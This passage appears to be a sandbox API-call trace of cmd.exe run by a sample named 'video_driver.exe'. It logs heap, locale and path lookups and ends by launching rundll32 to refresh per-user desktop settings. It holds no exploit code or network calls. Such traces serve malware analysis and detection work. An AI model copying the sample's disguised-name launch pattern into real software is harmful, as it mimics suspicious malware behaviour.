RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x54) returned 0x1017a0 [0042.017] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x37fb38 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.017] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x37fb38, lpFilePart=0x37fb34 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37fb34*="Desktop") returned 0x25 [0042.017] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.018] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x37f8b4 | out: lpFindFileData=0x37f8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x105738 [0042.018] FindClose (in: hFindFile=0x105738 | out: hFindFile=0x105738) returned 1 [0042.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x37f8b4 | out: lpFindFileData=0x37f8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfe3b9a80, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xfe3b9a80, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x105738 [0042.018] FindClose (in: hFindFile=0x105738 | out: hFindFile=0x105738) returned 1 [0042.018] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0042.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x37f8b4 | out: lpFindFileData=0x37f8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x105738 [0042.018] FindClose (in: hFindFile=0x105738 | out: hFindFile=0x105738) returned 1 [0042.018] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0042.018] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0042.019] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0042.019] GetProcessHeap () returned 0xf0000 [0042.019] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x104c48 | out: hHeap=0xf0000) returned 1 [0042.019] GetEnvironmentStringsW () returned 0x104158* [0042.019] GetProcessHeap () returned 0xf0000 [0042.019] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xb36) returned 0x105f78 [0042.019] FreeEnvironmentStringsW (penv=0x104158) returned 1 [0042.019] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aba5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0042.019] GetProcessHeap () returned 0xf0000 [0042.019] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x1017a0 | out: hHeap=0xf0000) returned 1 [0042.019] GetProcessHeap () returned 0xf0000 [0042.019] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x400e) returned 0x106ab8 [0042.020] GetProcessHeap () returned 0xf0000 [0042.020] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x88) returned 0x102e28 [0042.020] GetProcessHeap () returned 0xf0000 [0042.020] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x106ab8 | out: hHeap=0xf0000) returned 1 [0042.020] GetConsoleOutputCP () returned 0x1b5 [0042.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aba4260 | out: lpCPInfo=0x4aba4260) returned 1 [0042.020] GetUserDefaultLCID () returned 0x409 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aba4950, cchData=8 | out: lpLCData=":") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x37fc78, cchData=128 | out: lpLCData="0") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x37fc78, cchData=128 | out: lpLCData="0") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x37fc78, cchData=128 | out: lpLCData="1") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aba4940, cchData=8 | out: lpLCData="/") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aba4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aba4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aba4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aba4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aba4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aba4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aba4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aba4930, cchData=8 | out: lpLCData=".") returned 2 [0042.021] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aba4920, cchData=8 | out: lpLCData=",") returned 2 [0042.021] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0042.022] GetProcessHeap () returned 0xf0000 [0042.022] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x0, Size=0x20c) returned 0x102eb8 [0042.022] GetConsoleTitleW (in: lpConsoleTitle=0x102eb8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.023] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0042.023] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0042.023] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0042.023] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0042.023] GetProcessHeap () returned 0xf0000 [0042.023] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x400a) returned 0x106ab8 [0042.023] GetProcessHeap () returned 0xf0000 [0042.023] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x106ab8 | out: hHeap=0xf0000) returned 1 [0042.024] _wcsicmp (_String1="RUNDLL32.EXE", _String2=")") returned 73 [0042.024] _wcsicmp (_String1="FOR", _String2="RUNDLL32.EXE") returned -12 [0042.024] _wcsicmp (_String1="FOR/?", _String2="RUNDLL32.EXE") returned -12 [0042.024] _wcsicmp (_String1="IF", _String2="RUNDLL32.EXE") returned -9 [0042.024] _wcsicmp (_String1="IF/?", _String2="RUNDLL32.EXE") returned -9 [0042.024] _wcsicmp (_String1="REM", _String2="RUNDLL32.EXE") returned -16 [0042.024] _wcsicmp (_String1="REM/?", _String2="RUNDLL32.EXE") returned -16 [0042.024] GetProcessHeap () returned 0xf0000 [0042.024] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x58) returned 0x1030d0 [0042.024] GetProcessHeap () returned 0xf0000 [0042.025] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x22) returned 0x1017d8 [0042.026] GetProcessHeap () returned 0xf0000 [0042.026] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x6c) returned 0x103130 [0042.026] GetConsoleTitleW (in: lpConsoleTitle=0x37f970, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.027] GetFileAttributesW (lpFileName="RUNDLL32.EXE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rundll32.exe")) returned 0xffffffff [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0042.027] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="DIR") returned 14 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="ERASE") returned 13 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="DEL") returned 14 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="TYPE") returned -2 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="COPY") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="CD") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="CHDIR") returned 15 [0042.028] _wcsicmp (_String1="RUNDLL32", _String2="RENAME") returned 16 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="REN") returned 16 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="ECHO") returned 13 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="SET") returned -1 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="PAUSE") returned 2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="DATE") returned 14 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="TIME") returned -2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="PROMPT") returned 2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="MD") returned 5 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="MKDIR") returned 5 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="RD") returned 17 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="RMDIR") returned 8 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="PATH") returned 2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="GOTO") returned 11 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="SHIFT") returned -1 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="CLS") returned 15 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="CALL") returned 15 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="VERIFY") returned -4 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="VER") returned -4 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="VOL") returned -4 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="EXIT") returned 13 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="SETLOCAL") returned -1 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="ENDLOCAL") returned 13 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="TITLE") returned -2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="START") returned -1 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="DPATH") returned 14 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="KEYS") returned 7 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="MOVE") returned 5 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="PUSHD") returned 2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="POPD") returned 2 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="ASSOC") returned 17 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="FTYPE") returned 12 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="BREAK") returned 16 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="COLOR") returned 15 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="MKLINK") returned 5 [0042.029] _wcsicmp (_String1="RUNDLL32", _String2="FOR") returned 12 [0042.030] _wcsicmp (_String1="RUNDLL32", _String2="IF") returned 9 [0042.030] _wcsicmp (_String1="RUNDLL32", _String2="REM") returned 16 [0042.030] GetProcessHeap () returned 0xf0000 [0042.030] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x210) returned 0x1031a8 [0042.030] GetProcessHeap () returned 0xf0000 [0042.030] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x86) returned 0x1033c0 [0042.030] _wcsnicmp (_String1="RUND", _String2="cmd ", _MaxCount=0x4) returned 15 [0042.031] GetProcessHeap () returned 0xf0000 [0042.031] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x418) returned 0xf07f0 [0042.031] SetErrorMode (uMode=0x0) returned 0x0 [0042.031] SetErrorMode (uMode=0x1) returned 0x0 [0042.031] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xf07f8, lpFilePart=0x37f490 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x37f490*="Desktop") returned 0x25 [0042.031] SetErrorMode (uMode=0x0) returned 0x1 [0042.031] GetProcessHeap () returned 0xf0000 [0042.031] RtlReAllocateHeap (Heap=0xf0000, Flags=0x0, Ptr=0xf07f0, Size=0x6e) returned 0xf07f0 [0042.031] GetProcessHeap () returned 0xf0000 [0042.031] RtlSizeHeap (HeapHandle=0xf0000, Flags=0x0, MemoryPointer=0xf07f0) returned 0x6e [0042.031] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0042.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.031] GetProcessHeap () returned 0xf0000 [0042.031] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x120) returned 0x103450 [0042.031] GetProcessHeap () returned 0xf0000 [0042.031] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x238) returned 0xf0868 [0042.037] GetProcessHeap () returned 0xf0000 [0042.037] RtlReAllocateHeap (Heap=0xf0000, Flags=0x0, Ptr=0xf0868, Size=0x122) returned 0xf0868 [0042.037] GetProcessHeap () returned 0xf0000 [0042.037] RtlSizeHeap (HeapHandle=0xf0000, Flags=0x0, MemoryPointer=0xf0868) returned 0x122 [0042.037] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4abb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.037] GetProcessHeap () returned 0xf0000 [0042.037] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xe0) returned 0x103578 [0042.037] GetProcessHeap () returned 0xf0000 [0042.037] RtlReAllocateHeap (Heap=0xf0000, Flags=0x0, Ptr=0x103578, Size=0x76) returned 0x103578 [0042.037] GetProcessHeap () returned 0xf0000 [0042.037] RtlSizeHeap (HeapHandle=0xf0000, Flags=0x0, MemoryPointer=0x103578) returned 0x76 [0042.038] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x37f22c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f22c) returned 0xffffffff [0042.038] GetLastError () returned 0x2 [0042.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE.*", fInfoLevelId=0x1, lpFindFileData=0x37f20c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f20c) returned 0xffffffff [0042.038] GetLastError () returned 0x2 [0042.038] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x37f20c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f20c) returned 0xffffffff [0042.039] GetLastError () returned 0x2 [0042.039] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\RUNDLL32.EXE", fInfoLevelId=0x1, lpFindFileData=0x37f22c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x37f22c) returned 0x1035f8 [0042.039] GetProcessHeap () returned 0xf0000 [0042.039] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x0, Size=0x14) returned 0x103638 [0042.039] FindClose (in: hFindFile=0x1035f8 | out: hFindFile=0x1035f8) returned 1 [0042.039] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0042.039] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0042.039] GetConsoleTitleW (in: lpConsoleTitle=0x37f704, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0042.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x37f58c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x37f654 | out: lpAttributeList=0x37f58c, lpSize=0x37f654) returned 1 [0042.039] UpdateProcThreadAttribute (in: lpAttributeList=0x37f58c, dwFlags=0x0, Attribute=0x60001, lpValue=0x37f64c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x37f58c, lpPreviousValue=0x0) returned 1 [0042.039] GetStartupInfoW (in: lpStartupInfo=0x37f548 | out: lpStartupInfo=0x37f548*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0xf1a0c, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0042.039] GetProcessHeap () returned 0xf0000 [0042.039] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0x18) returned 0x103658 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.039] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.040] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0042.040] GetProcessHeap () returned 0xf0000 [0042.041] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x103658 | out: hHeap=0xf0000) returned 1 [0042.041] GetProcessHeap () returned 0xf0000 [0042.041] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xa) returned 0xfff98 [0042.041] lstrcmpW (lpString1="\\rundll32.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.042] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\rundll32.exe", lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x37f5e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x37f634 | out: lpCommandLine="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True", lpProcessInformation=0x37f634*(hProcess=0x78, hThread=0x74, dwProcessId=0x6c0, dwThreadId=0x738)) returned 1 [0042.051] CloseHandle (hObject=0x74) returned 1 [0042.051] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.051] GetProcessHeap () returned 0xf0000 [0042.051] HeapFree (in: hHeap=0xf0000, dwFlags=0x0, lpMem=0x105f78 | out: hHeap=0xf0000) returned 1 [0042.051] GetEnvironmentStringsW () returned 0x105f78* [0042.051] GetProcessHeap () returned 0xf0000 [0042.051] RtlAllocateHeap (HeapHandle=0xf0000, Flags=0x8, Size=0xb36) returned 0x104158 [0042.051] FreeEnvironmentStringsW (penv=0x105f78) returned 1 [0042.051] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0042.663] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x37f528 | out: lpExitCode=0x37f528*=0x0) returned 1 [0042.664] CloseHandle (hObject=0x78) returned 1 [0042.664] _vsnwprintf (in: _Buffer=0x37f670, _BufferCount=0x13, _Format="%08X", _ArgList=0x37f534 | out: _Buffer="00000000") returned 